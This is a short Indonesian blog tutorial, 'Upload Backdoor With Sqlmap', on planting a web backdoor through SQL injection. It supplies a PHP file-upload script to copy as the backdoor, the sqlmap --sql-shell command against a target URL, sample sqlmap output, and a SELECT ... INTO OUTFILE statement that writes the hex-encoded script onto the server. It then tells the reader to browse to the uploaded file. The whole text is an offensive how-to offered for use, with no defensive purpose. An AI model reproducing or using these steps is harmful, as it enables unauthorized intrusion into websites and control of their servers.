Upload Backdoor With Sqlmap


Contoh Target : http://www.target.com/file.php?id=22

Copy This Script : 



<form enctype="multipart/form-data" action="upload.php" method="POST"><input name="uploadedfile" type="file"/><input type="submit" value="Upload File"/></form> <?php $target_path=basename($_FILES['uploadedfile']['name']);if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$target_path)){echo basename($_FILES['uploadedfile']['name'])." File Ka upload Bro...!!!";}else{echo "Gagal Bro Euy...!";}?>

Rubah String To Hex Visit Here

 
python sqlmap.py -u http://www.target.com/file.php?id=22 --sql-shell

[15:35:06] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5
[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell>

SELECT 0x'Hex' INTO OUTFILE "PATH/namaFile";

tunggu dan jika beruntung akan ada pemberitahuan berhasil di upload, klo apes ya coba lagi,  klo berhasil silahkan browse file kita tadi, http://www.target.com/upload.php

Subscribe to receive free email updates: